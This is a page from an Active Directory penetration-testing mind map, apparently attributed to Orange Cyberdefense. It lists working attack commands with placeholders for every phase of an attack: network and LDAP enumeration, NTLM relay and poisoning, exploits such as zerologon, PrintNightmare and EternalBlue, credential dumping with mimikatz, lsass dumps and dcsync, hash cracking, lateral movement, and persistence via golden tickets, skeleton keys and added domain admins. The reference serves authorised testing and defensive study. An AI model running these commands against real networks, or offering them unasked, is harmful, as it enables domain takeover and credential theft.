Pentesting_Active_directory – XMind – Mind Mapping Software











  1. Scan Network

    1. cme smb <ip_range> # enumerate smb hosts
    2. nmap -sP -p <ip> # ping scan
    3. nmap -PN -sV –top-ports 50 –open <ip> # quick scan
    4. nmap -PN –script smb-vuln* -p139,445 <ip> # search smb vuln
    5. nmap -PN -sC -sV <ip> # classic scan
    6. nmap -PN -sC -sV -p- <ip> # full scan
    7. nmap -sU -sC -sV <ip> # udp scan
    8. find vulnerable host
  2. find AD IP

    1. nmcli dev show eth0 # show domain name & dns
    2. nslookup -type=SRV _ldap._tcp.dc._msdcs.//DOMAIN/
  3. zone transfert

    1. dig axfr <domain_name> @<name_server>
  4. List guest access on smb share

    1. enum4linux -a -u “” -p “” <dc-ip> && enum4linux -a -u “guest” -p “” <dc-ip>
    2. smbmap -u “” -p “” -P 445 -H <dc-ip> && smbmap -u “guest” -p “” -P 445 -H <dc-ip>
    3. smbclient -U ‘%’ -L //<dc-ip> && smbclient -U ‘guest%’ -L //<dc-ip>
    4. cme smb <ip> -u ” -p ” # enumerate null session
    5. cme smb <ip> -u ‘a’ -p ” # enumerate anonymous access
  5. Enumerate ldap

    1. nmap -n -sV –script “ldap* and not brute” -p 389 <dc-ip>
    2. ldapsearch -x -h <ip> -s base
    3. user found
  6. Find user list

    1. enum4linux -U <dc-ip> | grep ‘user:’
    2. crackmapexec smb <ip> -u <user> -p ‘<password>’ –users
    3. OSINT – enumerate username on internet

      1. nmap -p 88 –script=krb5-enum-users –script-args=”krb5-enum-users.realm='<domain>’,userdb=<users_list_file>” <ip>
    4. user found
  7. relay/poisoning

    1. find smb not signed

      1. nmap -Pn -sS -T4 –open –script smb-security-mode -p445 ADDRESS/MASK
      2. use exploit/windows/smb/smb_relay
      3. cme smb $hosts –gen-relay-list relay.txt
      4. unsigned SMB
    2. PetitPotam.py -d <domain> <listener_ip> <target_ip>
    3. responder -i eth0
    4. mitm6 -d <domain>
    5. user & hash found
  8. zerologon

    1. python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
      secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>[email protected]<IP> -no-pass -just-dc-user “Administrator”
      secretsdump.py -hashes :<HASH_admin> <DOMAIN>/[email protected]<IP>

      1. python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>
  9. mayfly (@M4yFly)
  10. Got one account on the domain

    1. Get all users

      1. GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
    2. enumerate SMB share

      1. cme smb <ip> -u <user> -p <password> –shares
    3. bloodhound

      1. bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
    4. powerview / pywerview
    5. kerberoasting

      1. Get hash

        1. GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
        2. Rubeus kerberoast
        3. hash found
      2. Get kerberoastable users

        1. Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
        2. MATCH (u:User {hasspn:true}) RETURN u
        3. MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
    6. MS14-068

      1. FindSMB2UPTime.py <ip>

        1. rpcclient $> lookupnames <name>
          wmic useraccount get name,sid
          auxiliary/admin/kerberos/ms14_068_kerberos_checksum
        2. goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>’@<target>

          1. kerberos::ptc “<ticket>”
    7. dnscmd.exe /config /serverlevelplugindll <\pathtodll> # need a dnsadmin user

      1. sc \DNSServer stop dns
        sc \DNSServer start dns
    8. PrintNightmare

      1. CVE-2021-1675.py <domain>/<user>:<password>@<target> ‘\<smb_server_ip><share>inject.dll’
    9. enum dns

      1. dnstool.py -u ‘DOMAINuser’ -p ‘password’ –record ‘*’ –action query <dc_ip>
  11. Got valid username

    1. Password spray

      1. Get password policy

        1. crackmapexec <IP> -u ‘user’ -p ‘password’ –pass-pol
        2. enum4linx -u ‘username’ -p ‘password’ -P <IP>
      2. cme smb <dc-ip> -u user.txt -p password.txt –no-bruteforce # test user=password
      3. cme smb <dc-ip> -u user.txt -p password.txt # multiple test (carrefull of lock policy)
      4. credentials found
    2. ASREPRoast

      1. Get hash

        1. python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
        2. Rubeus asreproast /format:hashcat
      2. Get ASREPRoastable users

        1. Get-DomainUser -PreauthNotRequired -Properties SamAccountName
        2. MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
      3. hash found
  12. Lateral move

    1. pass the hash

      1. psexec.py -hashes “:<hash>” <user>@<ip>
      2. wmiexec.py -hashes “:<hash>” <user>@<ip>
      3. atexec.py -hashes “:<hash>” <user>@<ip> “command”
      4. evil-winrm -i <ip>/<domain> -u <user> -H <hash>
      5. xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
    2. overpass the hash / pass the key (PTK)

      1. python getTGT.py <domain>/<user> -hashes :<hashes>

        1. export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache

          1. python psexec.py <domain>/<user>@<ip> -k -no-pass
      2. Rubeus asktgt /user:victim /rc4:<rc4value>

        1. Rubeus ptt /ticket:<ticket>
        2. Rubeus createnetonly /program:C:WindowsSystem32[cmd.exe||upnpcont.exe]

          1. Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
    3. Unconstrained delegation

      1. Get tickets

        1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get unconstrained delegation machines

        1. Get-NetComputer -Unconstrained
        2. Get-DomainComputer -Unconstrained -Properties DnsHostName
        3. MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
        4. MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    4. Constrained delegation

      1. Get tickets

        1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get constrained delegation machines

        1. Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
        2. MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
        3. MATCH (u:User {owned:true}), (c:Computer {name: “<MYTARGET.FQDN>”}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    5. Resource-Based Constrained Delegation
    6. dcsync

      1. lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
    7. WSUSpect

      1. WSUSpendu.ps1 # need compromised WSUS server
    8. sccm

      1. CMPivot
    9. MSSQL Trusted Links

      1. use exploit/windows/mssql/mssql_linkcrawler
    10. Printers spooler service abuse

      1. rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN

        1. printerbug.py ‘<domain>/<username>:<password>’@<Printer IP> <RESPONDERIP>
    11. AD acl abuse

      1. aclpwn.py

        1. GenericAll on User
        2. GenericAll on Group
        3. GenericAll / GenericWrite / Write on Computer
        4. WriteProperty on Group
        5. Self (Self-Membership) on Group
        6. WriteProperty (Self-Membership)
        7. ForceChangePassword
        8. WriteOwner on Group
        9. GenericWrite on User
        10. WriteDACL + WriteOwner
    12. GPO Delegation
    13. get laps passwords

      1. Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain><login> | Format-Table -AutoSize
      2. foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
    14. privexchange

      1. python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>

        1. ntlmrelayx.py -t ldap://<dc_fqdn>–escalate-user <user>
    15. ADCS
  13. Kindly provided by Orange Cyberdefense 😉
    Some commands can break stuff, be sure to know what are you doing !
    Please find legend below.
  14. Bloodhound
  15. PowerView
  16. find hash

    1. crack hash

      1. LM

        1. john –format=lm hash.txt
        2. hashcat -m 3000 -a 3 hash.txt
      2. NTLM

        1. john –format=nt hash.txt
        2. hashcat -m 1000 -a 3 hash.txt
      3. NTLMv1

        1. john –format=netntlm hash.txt
        2. hashcat -m 5500 -a 3 hash.txt
      4. NTLMv2

        1. john –format=netntlmv2 hash.txt
        2. hashcat -m 5600 -a 0 hash.txt rockyou.txt
      5. Kerberos 5 TGS

        1. john spn.txt –format=krb5tgs –wordlist=rockyou.txt
        2. hashcat -m 13100 -a 0 spn.txt rockyou.txt
      6. Kerberos ASREP

        1. hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt
  17. relay

    1. MS08-068

      1. use exploit/windows/smb/smb_relay #windows200 / windows server2008
    2. responder -I eth0 # disable smb & http

      1. ntlmrelayx.py -tf targets.txt
    3. mitm6 -i eth0 -d <domain>

      1. ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
      2. ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
      3. ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> –delegate-access

        1. getST.py -spn cifs/<target> <domain>/<netbios_name>$ -impersonate <user>
    4. adcs

      1. ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support –adcs –template DomainController

        1. Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
  18. Domain admin

    1. dump ntds.dit

      1. crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> –ntds
      2. secretsdump.py ‘<domain>/<user>:<pass>’@<ip>
      3. ntdsutil “ac i ntds” “ifm” “create full c:temp” q q

        1. secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
      4. windows/gather/credentials/domain_hashdump
  19. Persistance

    1. net group “domain admins” myuser /add /domain
    2. Golden ticket

      1. ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
    3. Silver Ticket
    4. DSRM

      1. PowerShell New-ItemProperty “HKLM:SystemCurrentControlSetControlLsa” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
    5. Skeleton Key

      1. mimikatz “privilege::debug” “misc::skeleton” “exit”
    6. Custom SSP

      1. mimikatz “privilege::debug” “misc::memssp” “exit”

        1. C:WindowsSystem32kiwissp.log
  20. Administrator access

    1. get credentials

      1. procdump.exe -accepteula -ma lsass.exe lsass.dmp

        1. mimikatz “privilege::debug” “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords” “exit”
      2. mimikatz “privilege::debug” “token::elevate” “sekurlsa::logonpasswords” “lsadump::sam” “exit”
      3. post/windows/gather/smart_hashdump

        1. hashdump
      4. cme smb <ip_range> -u <user> -p <password> -M lsassy
      5. cme smb <ip_range> -u <user> -p ‘<password>’ –sam / –lsa / –ntds
    2. LSA as a Protected Process

      1. PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
      2. mimikatz “!+” “!processprotect /process:lsass.exe /remove” “privilege::debug” “token::elevate” “sekurlsa::logonpasswords” “!processprotect /process:lsass.exe” “!-” #with mimidriver.sys
    3. search password files

      1. findstr /si ‘password’ *.txt *.xml *.docx
    4. search stored password

      1. lazagne.exe all
    5. shadow copies

      1. diskshadow list shadows all

        1. mklink /d c:shadowcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
    6. token manipulation

      1. .incognito.exe list_tokens -u

        1. .incognito.exe execute -c “<domain><user>” powershell.exe
      2. use incognito

        1. impersonate_token <domain>\<user>
    7. dpapi extract
  21. Low hanging fruit

    1. java rmi

      1. exploit/multi/misc/java_rmi_server
    2. ms17-010

      1. exploit/windows/smb/ms17_010_eternalblue
    3. tomcat/jboss manager

      1. auxiliary/scanner/http/tomcat_enum
        exploit/multi/http/tomcat_mgr_deploy
    4. java serialized port

      1. ysoserial
    5. vulnerable product with cve

      1. searchsploit
    6. MS14-025

      1. use scanner/smb/smb_enum_gpp
      2. findstr /S /I cpassword \<FQDN>sysvol<FQDN>policies*.xml
    7. database credentials

      1. use admin/mssql/mssql_enum_sql_logins
    8. proxylogon
    9. proxyshell
  22. Low access

    1. winpeas.exe
    2. search password files

      1. findstr /si ‘password’ *.txt *.xml *.docx
    3. Juicy Potato / Lovely Potato
    4. PrintSpoofer
    5. RoguePotato
    6. SMBGhost CVE-2020-0796
    7. CVE-2021-36934 (HiveNightmare/SeriousSAM)
  23. Trust relationship

    1. Child Domain to Forest Compromise – SID Hijacking

      1. Get-NetGroup -Domain <domain> -GroupName “Enterprise Admins” -FullData|select objectsid

        1. mimikatz lsadump::trust

          1. kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
    2. Forest to Forest Compromise – Trust Ticket

      1. “lsadump::trust /patch”
        “lsadump::lsa /patch”

        1. “kerberos::golden /user:Administrator /domain:<domain> /sid:
          <domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:
          <golden_ticket_path>”

          1. .Rubeus.exe asktgs /ticket:<kirbi file> /service:”Service’s SPN” /ptt
    3. Breaking forest trust

      1. printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dcsync